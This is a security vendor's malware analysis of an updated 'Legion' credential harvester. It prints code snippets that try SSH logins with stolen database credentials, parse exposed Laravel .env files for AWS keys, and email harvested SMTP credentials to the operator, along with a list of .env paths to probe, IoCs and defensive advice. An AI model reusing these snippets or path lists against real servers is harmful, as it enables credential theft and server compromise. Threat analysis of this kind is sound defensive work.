Introduction: A cloud credential harvester and SMTP Hijacker
Cado Security Labs (now part of Darktrace) discovered and reported [1] on an emerging cloud-focused hacktool, designed to harvest credentials from misconfigured web servers and leverage these credentials for email abuse. The tool was named ‘Legion’ by its developers and was distributed and marketed in various public groups and channels within the Telegram messaging service.
In early 2023, Cado researchers encountered what is believed to be an updated version of this commodity malware, with some additional functionality of interest to cloud security professionals.
SSH abuse
In the sample [2] of Legion previously analyzed by Cado, the developers included code within a class named ‘legion’ to parse a list of exfiltrated database credentials and extract username and password pairs. The function then attempted to use these credentials in combination with a matching host value to log in to the host via SSH - assuming that these credentials were being reused across services.
To achieve this within Python, the Paramiko library (a Python implementation of the SSHv2 protocol) was used. However, in the original sample of Legion, the import of Paramiko was commented out, making the code leveraging it redundant. In Legion’s most recent update, it appears that this functionality has been enabled.
if db_user and db_pass:
connected = 0
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, 22, db_user, db_pass, timeout=3)
fp = open('Results/!Vps.txt', 'a+')
build = str(host)+'|'+str(db_user)+'|'+str(db_pass)+'\n'
remover = str(build).replace('\r', '')
fp.write(remover + '\n\n')
fp.close()
connected += 1
except:
pass
finally:
if ssh:
ssh.close() Python snippet of Legion’s SSH connection code
Exploiting additional cloud services
Legion’s credential gathering capabilities were discussed at length in Cado’s previous blog on the topic. Essentially, the malware hunts for environment variable files in misconfigured web servers running PHP frameworks such as Laravel. Legion attempts to access these .env files by enumerating the target server with a list of hardcoded paths in which these environment variable files typically reside. If these paths are publicly accessible, due to misconfigurations, the files are saved and a series of regular expressions are run over their contents.
From the searches performed on the environment variable files, it’s easy to determine the services the malware attempts to retrieve credentials for. In the updated version of Legion, the malware can be seen searching for credentials specific to the following services/technologies:
- DynamoDB
- Amazon CloudWatch
- AWS Owl
For CloudWatch specifically, the malware searches for the environment variable CLOUDWATCH_LOG_KEY. This variable name appears in the documentation for public Laravel projects, including a project [3] for handling CloudWatch logging in Laravel. This fits with Legion’s capabilities, as the tool’s credential harvesting feature targets Laravel apps.
elif "CLOUDWATCH_LOG_KEY" in str(text):
if "CLOUDWATCH_LOG_KEY=" in str(text):
method = '/.env'
try:
aws_key = reg("\nCLOUDWATCH_LOG_KEY=(.*?)\n", text)[0]
except:
aws_key = ''
try:
aws_sec = reg("\nCLOUDWATCH_LOG_SECRET=(.*?)\n", text)[0]
except:
aws_sec = ''
try:
asu = legion().get_aws_region(text)
if asu:
aws_reg = asu
else:
aws_reg = ''
except:
aws_reg = '' Parsing .env files for the value of CLOUDWATCH_LOG_KEY
elif "AWSOWL_ACCESS_KEY_ID" in str(text):
if "AWSOWL_ACCESS_KEY_ID=" in str(text):
method = '/.env'
try:
aws_key = reg("\nAWSOWL_ACCESS_KEY_ID=(.*?)\n", text)[0]
except:
aws_key = ''
try:
aws_sec = reg("\nAWSOWL_SECRET_ACCESS_KEY=(.*?)\n", tex
except:
aws_sec = ''
try:
asu = legion().get_aws_region(text)
if asu:
aws_reg = asu
else:
aws_reg = ''
except:
aws_reg = '' Parsing .env files for the value of AWSOWL_ACCESS_KEY_ID and AWS_OWL_SECRET_ACCESS_KEY
Miscellaneous updates
Aside from general refactoring, the Legion developers have made some additional updates to the hacktool.
One such update is a change to the subject line of test emails sent by the malware, which now include a reference to “King Forza”. The Forza name was also used in a YouTube channel linked by Cado researchers to the operators of the Legion malware.
smtp_server = str(mailhost)
login = str(mailuser.replace('"', '')) # paste your login generated by Mailtrap
password = str(mailpass.replace('"', '')) # paste your password generated by Mailtrap
receiver_email = emailnow
message = MIMEMultipart('alternative')
message['Subject'] = f'King Forza SMTP | {mailhost} '
message['From'] = sender_email
message['To'] = receiver_email
text = ' '
html = f" <h3>King Forza smtps! - SMTP Data for you!</h3><br>{mailhost} <br><br><h5>Mailer King with from</h5><br>==================<br><i>{mailhost}:{mailport}:{mailuser}:{mailpass}:{mailfrom}:ssl::::0:</i><br>==================<br><br><h5>Mailer king Normal</h5><br>==================<br>{mailhost}:{mailport}:{mailuser}:{mailpass}::ssl::::0:<br>==================<br><br> "
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
message.attach(part1)
message.attach(part2) Snippet showing updated subject line, including Forza name
Another update included adding additional paths to enumerate for the existence of .env files. The new paths can be seen below:
/lib/.env
/lab/.env
/cronlab/.env
/cron/.env
/core/app/.env
/core/Datavase/.env (sic)
/database/.env
/config/.env
/apps/.env
/uploads/.env
/sitemaps/.env
/saas/.env
/api/.env
/psnlink/.env
/exapi/.env
/site/.env
/web/.env
/en/.env
/tools/.env
/v1/.env
/v2/.env
/administrator/.env
Conclusion
Legion is an actively developed hacktool, specifically designed to exploit vulnerable web applications in an attempt to harvest credentials. Legion focuses primarily on retrieving credentials for SMTP and SMS abuse. However, this recent update demonstrates a widening of scope, with new capabilities such as the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications. It’s clear that the developer’s targeting of cloud services is advancing with each iteration.
Detection and prevention advice remains consistent with Cado’s previous blog on this malware family. Misconfigurations in web applications are still the primary method used by Legion to retrieve credentials. Therefore, it’s recommended that developers and administrators of web applications regularly review access to resources within the applications themselves, and seek alternatives to storing secrets in environment files.
Indicators of compromise (IoCs)
Filename - SHA256
og.py - 6f059c2abf8517af136503ed921015c0cd8859398ece7d0174ea5bf1e06c9ada
User agents
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
References
![Darktrace’s detection of the unusual external connection to 142.11[.]206[.]73 via port 8000.](https://cdn.prod.website-files.com/626ff4d25aca2edf4325ff97/69fa6d343ee828935a4a00f5_Screenshot%202026-05-05%20at%203.20.33%E2%80%AFPM.png)
